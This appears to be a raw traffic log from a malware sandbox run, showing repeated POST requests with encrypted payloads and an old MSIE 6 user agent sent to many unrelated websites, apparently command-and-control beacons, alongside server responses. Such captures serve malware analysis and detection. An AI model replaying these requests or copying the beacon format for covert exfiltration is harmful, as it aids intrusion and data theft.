..._.{q.`;..........C.S.....W.1.....|.Y}....2..s.H..q....*z:|2..]...F.
j.....jq...#.."[.9..4-k...r....Y.?......f.K.......73...v.].......y....
N_......0.b..:.a...'G..".(.x...;8d#>j.}......j..Bu....3.@..h...Z...
.......j0h0...U.%..0... .......0... .....0......0...U.......0.0...U...
........0"..U....0...0.1.0...U....TGV-OFF-510...*.H.............1.....
..9...4...;.xC%:W.J.....c...o..J.E.]%{j......^).~..qX.....iK..1vv....R
._....&.O.%.(.|........S;5. ..A.&....)....D*uwKz1..V.....n....>...a
..|......W..1:....Rl..s/.......\n.e...%E.. ...G.PIP.$.8.p.."...$?e....
..\...u.;...-......D".|h...>6rO. ......Hd~...

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: atr-technologies.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=d7931c4c5e390183a8c947585e6f9c9c81498907800

lAuchB4Xw3THiRZfaRN7JwE2 The/85/MtmD0qOilVg tZJ01PRAdf1wchlS2e7xdROBTdcB7PogpYCQmNmGzIod73GUgS52r4HrTpSm3C9VQDMrBfoBoa4jxbBobZ62Hs/8KG/G5ImLHutTQROgrSYKWyKE8L3Iz65951Vq8wL1Y/VhuPZyB4lSePnHJ5fnA/OhI8cwiF 1mNxo7t8T075kDBJ0a4b wlbikfTjqHXZf94bvcVHKPdi7TgDOkP8tech5yGqEf6ZBK82h18 XHyPFLaIQVSr0IvbRneC6EhW5T3Yzm9meaVU22D7Ots  pvyNUEnLYUZRjZX9Z6b3zHR474FBTzNFekJEAxhI87TUEPuNJiaghTlNWU/HCSe9Z WGDwSYSEsn/ldgnj5 sZy6fg/EfixDx0kUe/CNhDY2MYMuP84uPCk8n9j5cshITfXwXYrfmuD964/qzN3OwrK5lRQ0qG2
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f4f0b6b98231-KBP
1069..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 432
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nuritech.com
Connection: Keep-Alive
Cache-Control: no-cache

FZrga2 SK2AlwlNajp3Ux3i6 22F74ghE8lAkuPz9PbAUPbftQrlN1a JzYzakTOrH9TPU7IgLeYPbHpWaP68jxIfVQ/hTLBXQ9a4WvGHwCeAK3pJtB2V/wG s4IJXYNi8jHH P86zehghndXs0VkGB19stAAK8LsZUlkq68djaddMflVEmm0RJBBesSbNEyv2e9xBxM2py1npd7cQc/99dRf VJ1xwNFp76eO7N7x7xetx4830112CneJW274Wqngrw2DyBkItCw7gRpZfO9GrSEA54ZK5TwLv Nyet1bRqJWaLTPNPrBKGb7AGsCX0D9L1sSCNFmF/CpTooNVl9HcOU/SHnQ3Wj QbPNECK6k1D6MTJlRRrIS TQo2YAa4s8cS3WEl026MAnQOdgdz7nAxY3T9LTbmue1EAnAH8X2N7uA=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:41 GMT
Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3073bef7289cc87bceb525201efe6310; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
HTTP/1.1 200 OK..Date: Sat, 01 Jul 2017 11:16:41 GMT..Server: Apache/2
.2.14 (Unix) DAV/2 PHP/5.2.11..X-Powered-By: PHP/5.2.11..Set-Cookie: P
HPSESSID=3073bef7289cc87bceb525201efe6310; path=/..Expires: Thu, 19 No
v 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidat
e, post-check=0, pre-check=0..Pragma: no-cache..Content-Length: 0..Kee
p-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: tex
t/html..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.kafrit.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:21:07 GMT
Content-Length: 16486
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xht
ml" xml:lang="en" lang="en">..<head>.<title></title&
gt;.<meta http-equiv="Content-Type" content="text/html; charset=utf
-8" />.<meta name="keywords" content="" />.<meta name="des
cription" content="" />..<meta name="ROBOTS" content="INDEX,FOLL
OW" />.<script src='/content/js/jquery-1.6.2.min.js' type='text/
javascript'></script>.<link rel='stylesheet' href='/Conten
t/Styles/style.css' />..<script type='text/javascript'>..var
G_PageID='12369'..</script>...</head>.<body>........
<div id="container"> ... <div id="content">....<div>
; </div>.....<script type="text/javascript">.. var _
gaq = _gaq || [];. _gaq.push(['_setAccount', 'UA-42712048-1']);. _ga
q.push(['_trackPageview']);.. (function() {. var ga = document.cre
ateElement('script'); ga.type = 'text/javascript'; ga.async = true;.
ga.src = ('https:' == document.location.protocol ? 'hXXps://ssl' : '
hXXp://www') '.google-analytics.com/ga.js';. var s = document.get
ElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);. })
();..</script>.<div id="header">....<div class="web_wid
th">.........<div style="position:absolute;z-index:1;left:0px;"&
gt;<a href="hXXp://VVV.kafrit.com"><img src="/content/images/
empty_logo.png" alt="" BORDER="0" /></a></div>.....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cbsprinting.com.au
Connection: Keep-Alive
Cache-Control: no-cache

IN Cl00f6HEUJUEIxDg2kAZ9pKi7WBW/0SwWJJaaVmS4E1ZNM4qNPp9HWsvPJyhqNsuhk3HUpRCSnvc96SGmX MW12Vhr5PNSIpqgFfdeyG5pI8wnnU0qGfK8J0zelKZtZt2WCrEA5Mp2s2rCI0P1zfi2kRsysSXGZwy7 EoYZZZCAsB3 X1bGODPsPqD2R6wvQsLfUmy3unj3zvZXjdc5h42wN/TGx2 qE0 EjwUIg53JhibKeXyXcubU8WX/JzN4B10vxh0CancQjtkTWvTf3 NJ5N6HTpKFgoZyzhInq4UURTmJgDtjybTLyAipcpHZCvyDn3uEL7V/hRxvUMHRoGrxkxkRLaD7Ouci5Nsglfr1PkpAC4bC9oIHCykxQ1JfNib8CH8rfrAp6dqz8ZCRDPuXPRJgKk7Ho5kWRuyudcPhRvnsjMN61F
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d7d05c77256da28a215bc113485b20c951498907821; expires=Sun, 01-Jul-18 11:17:01 GMT; path=/; domain=.cbsprinting.com.au; HttpOnly
X-Pingback: hXXp://VVV.cbsprinting.com.au/xmlrpc.php
Location: hXXp://VVV.cbsprinting.com.au/
Vary: User-Agent
Server: cloudflare-nginx
CF-RAY: 3778f4dc615983e2-KBP
0..HTTP/1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11:17:02 GMT
..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..
Connection: keep-alive..Set-Cookie: __cfduid=d7d05c77256da28a215bc1134
85b20c951498907821; expires=Sun, 01-Jul-18 11:17:01 GMT; path=/; domai
n=.cbsprinting.com.au; HttpOnly..X-Pingback: hXXp://VVV.cbsprinting.co
m.au/xmlrpc.php..Location: hXXp://VVV.cbsprinting.com.au/..Vary: User-
Agent..Server: cloudflare-nginx..CF-RAY: 3778f4dc615983e2-KBP..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: empordalia.com
Connection: Keep-Alive
Cache-Control: no-cache

Uk5SR0pPcmgWbHfXrXYO1A0bdU36aIhFHqY DY8cKRzS1MUs8hk0Cym/Vf W0tF7V/dPU3vhYyEzZ40r3pUps2fJKTwZftsSBgW2z/wPizZvGHT08ujN7ibulGNW9iSrybeG4vchzldJM0ln/ESZAxL KuWU86xVlP3ujMqHZSPSuCjQLBzIN3AyfXVDuZwQjrRetneWia5lXPaVRUAMCe68gjtsKx3tXbOD622W5oiSS23/65Icd/r7qDcrlW7DPGtRKZCMKDfPbOo113JNCXReWWrzdCaurXVCgUuavw/9WtAVhsrEz6JMLQhGuBJWECCKID6dlIergk2qors7cwPICePUzIE236E80Q3YcEf62jd6Wy mDrpVSSTBCQRH2/zNCk8NaVFXniJqEAIgEVH0h79iznYH4H1yBy5JK7c5jtJGAjtMgrvmkzxtCWdfzer/rywt
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Sat, 01 Jul 2017 11:16:50 GMT
Server: Apache
X-Powered-By: PHP/7.0.20
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Powered-By: PrestaShop
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: PrestaShop-e40945554f12a7c4e2a9ad0ea8b63dcc=xef3+mkz8EkMmm7HsoGBKYRTzEUqRg9hW0JfO6iiQSgKdO491tUF77iGsMM6lvoXCsaXC/uBBogQmOEu+/QjI/MsnPn6xnRq80TpsLZ9kDs2xGImVLPCMenQirXpEvHJqE+2q0spjq1bg7xniZphYBIVC+lvij5yXFkS85Diam8=000115; expires=Fri, 21-Jul-2017 11:16:50 GMT; Max-Age=1728000; path=/; domain=empordalia.com; HttpOnly
32b..<!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-j
s lt-ie9 lt-ie8 lt-ie7" lang="ca-es"><![endif]--> <!--[if
IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="ca-es"><
![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" l
ang="ca-es"><![endif]--> <!--[if gt IE 8]><html clas
s="no-js ie9" lang="ca-es"><![endif]--><html lang="ca-es"&
gt;<head><meta charset="utf-8" /><title>Empordalia&l
t;/title><meta name="description" content="Empord..lia ..s un ce
ller de vi de la do empord.. que produeix vini oli ..nics. Entre els s
eus productes destaquen, l...oli de Pau y la gamma de vins Sinols, Ant
ima, balmeta y Coromina." /><meta name="keywords" content="empor
dalia ,vi emporda,oli d'oliva extra verge,oli de pau,sinols,celle
r de vi ,vi catala,do emporda ,vi catala " /><meta name="generat
or" content="PrestaShop" /><m..b7b5..eta name="robots" content="
index,follow" /><meta name="viewport" content="initial-scale=1,u
ser-scalable=no,maximum-scale=1,width=device-width"><meta name="
apple-mobile-web-app-capable" content="yes" /><link rel="icon" t
ype="image/vnd.microsoft.icon" href="/img/favicon.ico?1484670747" />
;<link rel="shortcut icon" type="image/x-icon" href="/img/favicon.i
co?1484670747" /> <!--[if lte IE 9]><link rel="stylesheet"
href="hXXp://empordalia.com/themes/warehouse/cache/ie9/ie_split_2_v_4
0_44d2f2a3f3bd08fdf0abd8b942f8bc6f_all.css" type="text/css" media=

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ryumachi-jp.com
Connection: Keep-Alive
Cache-Control: no-cache

zdlPlK4n4W2XXnvbuUurZhHhRQsuswPUwmqM8feQiMCf/3dR1OoongsLuFwj/KBmysnQ osBbt6L2qw98D/cTq3daUjCB6X9ajNjVzcpAUvy6XvMofmr SvCpJo8cfMVFJaKX32NrtsmQLQTYQ3De4WpyboQj2VW24SOivr4mE6wPPoEfKSDUfTMi1tawggK0IJWZIFlYjpgJTxtWZa54Gurs3SBBxPyeENUIY8PwejRgEzPzC0E5A6h03UsLLoG4hD9m4a6tcNsEEL yeiBdyxZfRHnDBP4cRdTLCIbfNghSQjRX8u32NyPrRShb8sxWJKU2IE1RFq61Eo cLjOe9 5zW5MINsa1JG4XbyYQfdC0T j9IXamZoOshhx m/Swa1kUe51o3Y0yPAWIOoj6exdcx3ioHYhjRWt4dmKSWITMgzqV3pBLiUOPOtbXpeWVFCkbNk5514OglV70G14sXJWhGNaW7FSrqSOC5g/dMbBzpWj kehy6JfkPaib/CZILa1j5s=
HTTP/1.0 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:57 GMT
Server: Apache/2.0.64 (Unix)
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.<hr>.<address>A
pache/2.0.64 (Unix) Server at ryumachi-jp.com Port 80</address>.
</body></html>...


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.dbcomponents.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.6
Link: <hXXp://VVV.dbcomponents.com/wp-json/>; rel="hXXps://api.w.org/", <hXXp://wp.me/P7VeSu-4R>; rel=shortlink
X-Powered-By: PleskLin
1edb..<!DOCTYPE html><html lang="en-US"><head><me
ta charset="UTF-8" /><meta name="viewport" content="width=device
-width, initial-scale=1"><link rel="profile" href="hXXp://gmpg.o
rg/xfn/11" /><link rel="pingback" href="hXXp://VVV.dbcomponents.
com/xmlrpc.php" /><!--[if lt IE 9]> <script src="hXXp://ww
w.dbcomponents.com/wp-content/themes/lifemag/js/html5.js"></scri
pt> <link media="all" rel="stylesheet" type="text/css" href="htt
p://VVV.dbcomponents.com/wp-content/themes/lifemag/css/ie9.css"> &l
t;![endif]--><link type="text/css" media="all" href="hXXp://VVV.
dbcomponents.com/wp-content/cache/autoptimize/css/autoptimize_0d31bd6e
8ea3a4f8cf7002161f820cd3.css" rel="stylesheet" /><title>D&
;B Components</title><link rel='dns-prefetch' href='//s0.wp.c
om' /><link rel='dns-prefetch' href='//s.gravatar.com' /><
link rel='dns-prefetch' href='//fonts.googleapis.com' /><link re
l='dns-prefetch' href='//cdn.jsdelivr.net' /><link rel='dns-pref
etch' href='//s.w.org' /><link rel="alternate" type="application
/rss xml" title="D&B Components » Feed" href="hXXp://VVV.dbc
omponents.com/feed/" /><link rel="alternate" type="application/r
ss xml" title="D&B Components » Comments Feed" href="hXXp://
VVV.dbcomponents.com/comments/feed/" /> <script type="text/javas
cript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/ima
ges\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\

<<< skipped >>>

GET / HTTP/1.1

Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.dbcomponents.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.6
Link: <hXXp://VVV.dbcomponents.com/wp-json/>; rel="hXXps://api.w.org/", <hXXp://wp.me/P7VeSu-4R>; rel=shortlink
X-Powered-By: PleskLin
1edb..<!DOCTYPE html><html lang="en-US"><head><me
ta charset="UTF-8" /><meta name="viewport" content="width=device
-width, initial-scale=1"><link rel="profile" href="hXXp://gmpg.o
rg/xfn/11" /><link rel="pingback" href="hXXp://VVV.dbcomponents.
com/xmlrpc.php" /><!--[if lt IE 9]> <script src="hXXp://ww
w.dbcomponents.com/wp-content/themes/lifemag/js/html5.js"></scri
pt> <link media="all" rel="stylesheet" type="text/css" href="htt
p://VVV.dbcomponents.com/wp-content/themes/lifemag/css/ie9.css"> &l
t;![endif]--><link type="text/css" media="all" href="hXXp://VVV.
dbcomponents.com/wp-content/cache/autoptimize/css/autoptimize_0d31bd6e
8ea3a4f8cf7002161f820cd3.css" rel="stylesheet" /><title>D&
;B Components</title><link rel='dns-prefetch' href='//s0.wp.c
om' /><link rel='dns-prefetch' href='//s.gravatar.com' /><
link rel='dns-prefetch' href='//fonts.googleapis.com' /><link re
l='dns-prefetch' href='//cdn.jsdelivr.net' /><link rel='dns-pref
etch' href='//s.w.org' /><link rel="alternate" type="application
/rss xml" title="D&B Components » Feed" href="hXXp://VVV.dbc
omponents.com/feed/" /><link rel="alternate" type="application/r
ss xml" title="D&B Components » Comments Feed" href="hXXp://
VVV.dbcomponents.com/comments/feed/" /> <script type="text/javas
cript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/ima
ges\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: marcusgrimes.co.uk
Connection: Keep-Alive
Cache-Control: no-cache

K4GqshPybF5IEcyd2tBFFLzJYm358RUN9zAYiw9gV8Gp/YeB/iksH1yxtwhQyBWCDZ3wHLvaw1vdQRYCfV67efPKO8E0V36tacPYRxoaoFgOx9uwES7AYt6VQqbxOXEk ytwfFfWiXaCimvca6i WdnXUahg15TW2gWJYFVqQR0Dfwu k eVoywvWfSAlb3lYxWrmz7B7qf1VH/3beO1uS1FO8z36FX4FTi1VA6JQn3OsozCT1Iw0e7Sr3Fu9YOHcbw5ur0UIMGitamEkXe8/XtfOihQlioZ6xaHVDwmxp1eIxoazaINrjh833W2NW XrdIDftQG3NMH4x8fWWB3097HdHy7F7sKm392UivRcwQieq2cGFWBsy0S0BvADiQCGQoqXBbjB1dnTfSrQyvspufbvdyQClHGcDBltEeboyyQKOjmkOfhi9 HMxXuEtqLfW 4bhRRUTv/v xcEbUOfJEXZYtjOqhqEQ==
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:40 GMT
Content-Length: 35475
..<!DOCTYPE html>..<html xmlns="hXXp://VVV.w3.org/1999/xhtml"
>..<head><meta charset="UTF-8" /><meta name="viewpor
t" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;
user-scalable=0;" /><link href="hXXp://fonts.googleapis.com/css?
family=Open Sans:300italic,400italic,400,300" rel="stylesheet" type="t
ext/css" /><link rel="stylesheet" href="/css/bootstrap.min.css"
/><link rel="stylesheet" href="/css/flexslider.css" /><lin
k rel="stylesheet" href="/css/style.css" /><link rel="stylesheet
" href="/css/responsive.css" />.. <script type="text/javascri
pt" src="/js/jquery.min.js"></script>..<script type="text/
javascript" src="/js/bootstrap.min.js"></script>..<script
type="text/javascript" src="/js/jquery.flexslider-min.js"></scri
pt>..<script type="text/javascript" src="/js/script.js"></
script>.. .. ..<script type="text/javascript">.. $(win
dow).load(function () {.. $('.flexslider').flexslider({..
animation: "fade",.. controlNav: false,..
directionNav: false,.. slideshow: true,.. animat
ionDuration: 1600,.. animationLoop: true,.. slid
eshowSpeed: 7000.. });.. });..</script>.. <script&g
t;.. $(function () {.. $('#my-request-view').on('shown.bs.
modal', function (e) {.. var invoker = $(e.relatedTarget);
.. var href = invoker.attr('propid');.. $(

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sigmametalsinc.com
Connection: Keep-Alive
Cache-Control: no-cache

jtm6tpHOaX59VAA0MDZF/OqgHfhPs8yNVY7VeaOM0yAZlAxKT4G6BHOohKUUiLF8NHhPC2crGZ0YkIf4jgbi3FJ1g50uO2CBeXn6sPDobr3xExjNVbshoPkGdr9PNWvYXTyzJQk749ArCntfnmoPvF3YWVNivvRdCOYgdlEy37hCdOlwmfHdjnDxWN3puxue56Ph Ox1XUQ6E18cth8B9M8mfy1WI2BONceJzTE/Y2e5XdADpKYRAuZW5jTUDpeL2KQuo uXrtfT/4ymdRONvy5VO iL1mdWyPmQl h5KQKajyALbFYV1vg4  IJgWO3EL/Z968eFSPuo8STmpAuIq6bXqrjJg1wkgVq2U8DhJ/F/0b90uyxOhviGOFSz8cnSO3RPRE/ P1/bxKYGE0bFVmfX7KJEtaoSBt90VR7TPUgn81e6BmOhPKI0XPLIXyXHSyH4Q240CglxNt iT1xfKcUYnuXX3sK1XtYwz5gOAqrsTXernZ9uKuKOpI=
HTTP/1.1 418 unused
Date: Sat, 01 Jul 2017 11:17:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 518
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>418 unused</title>.</head><bod
y>.<h1>unused</h1>.<p>The server encountered an i
nternal error or.misconfiguration and was unable to complete.your requ
est.</p>.<p>Please contact the server administrator,. webm
aster@sigmametalsinc.com and inform them of the time the error occurre
d,.and anything you might have done that may have.caused the error.<
;/p>.<p>More information about this error may be available.in
the server error log.</p>.</body></html>...


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: coop.nl
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:52 GMT
Server: Apache/2
Location: hXXps://VVV.coop.nl/
Content-Length: 228
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXps://VVV.coop.nl/">here</a>.
</p>.</body></html>.HTTP/1.1 301 Moved Permanently..
Date: Sat, 01 Jul 2017 11:16:52 GMT..Server: Apache/2..Location: https
://VVV.coop.nl/..Content-Length: 228..Keep-Alive: timeout=5, max=100..
Connection: Keep-Alive..Content-Type: text/html; charset=iso-8859-1..&
lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&l
t;head>.<title>301 Moved Permanently</title>.</head&
gt;<body>.<h1>Moved Permanently</h1>.<p>The do
cument has moved <a href="hXXps://VVV.coop.nl/">here</a>.&
lt;/p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sarpy.com
Connection: Keep-Alive
Cache-Control: no-cache

RMeTlUGcToettbqoIMgHsBqulN /GjGiBd83YTWTfaoCStk32vZQr00C3Vf1Ye2ChNLRlMG04/5cukQ/DqVd13cobKiHIisbP6oo7MxJu30yIHosk7Kip549nzNuL6Gtr79wIosZOSbWcBczGYVfCLxb6XKUmNYDICoI/Iv7bput1PgNMYStwaKHw9n9RWQk2nrXC4PS43l/UfDvcsiGc jIESrJoM08qg/luxuD7VY9ml9CDdhrKVMnIekDFa9 KCgK6IgKILtnAVgfyZKUnPZflLJRvRjpeIOymfuczxewl1rrm0vKA55zKjuAZQldNyjpw2qGErgfJwmeVPd/QdHtHKqf8zs2P32H7Dbe wlM3m9dGBD11W0F2KOkQboLEvItcUbfqU8R0eLOuqF/VYNWWdBsVoSrd9p9eQqK26yJ
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:17:18 GMT
Content-Length: 25264
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http:/
/VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http
://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">..<head>...
<title>Sarpy County Nebraska</title>...<meta http-equiv
="Content-Type" content="text/html; charset=utf-8" />...<link ty
pe="text/css" rel="stylesheet" href="inc/style.css" />...<script
type="text/javascript" src="scripts/swfobject.js"></script>.
..<script type="text/javascript" src="scripts/nav.js"></scrip
t>...<meta name="google-site-verification" content="VkVqcPILdDTr
jJt3DxI77Two9_-JXBDR4EicoDXyDQI" />...<!--[if IE 6]>...<sc
ript type="text/javascript" src="../scripts/nav.js"></script>
...<script type="text/javascript" src="../scripts/DD_belatedPNG_0.0
.7a.js"></script>...<script type="text/javascript">...
DD_belatedPNG.fix('img, div');...</script>...<![endif]-->
.. <script src="scripts/AC_RunActiveContent.js" type="text/java
script"></script>..</head>..<script type="text/javas
cript">..var gaJsHost = (("https:" == document.location.protocol) ?
"hXXps://ssl." : "hXXp://VVV.");..document.write(unescape(""));..</script>..<script type="text/javascri
pt">..try {..var pageTracker = _gat._getTracker("UA-10809384-1");..
pageTracker._trackPageview();..} catch(err) {}</script>..<

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toutenmeuse.com
Connection: Keep-Alive
Cache-Control: no-cache

A9CGCH4uy16gkz0 SYOUi2Egt10 ms1Rkv6QGk3y2Qg7pouxayXzh7GJpyMPYrUNIj5gZcYqjp3BjKvFrKxdRxKMk1BsDE9YQFU7yBySOOxsZyxjw92AYDDUkDrS93odayPjwBD9QeWy6DDfpEkTI2ShTcr5J8A5KO9In8JHkFMyiUq0utc5eugk2FF62TP4fGqs9XGKnymORFg1B5kckbXw8FTI1HTC7jPVymr3jbXQgcJzO7I0UmKUpCYvcyZ/p9vCGZoa/S/3L25NAPIm cXfCgc7UJFq4wsXGsP8CU/I2eITkZFj4PzELCwbiTmofRL77kncEU24IWyOQznMEloEks6/y4S3D6XLU7NmfGpwDEbZ7him4wFls20xnO1hFcawtk8yOq28VP4CbWUg89A1d0 m6ZnYaNRVi0udhkdZpVVfVefAqks0x0n1rw==
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
04 Not Found..Server: nginx..Date: Sat, 01 Jul 2017 11:16:39 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>404 Not Found</title></hea
d>..<body bgcolor="white">..<center><h1>404 Not F
ound</h1></center>..<hr><center>nginx</cent
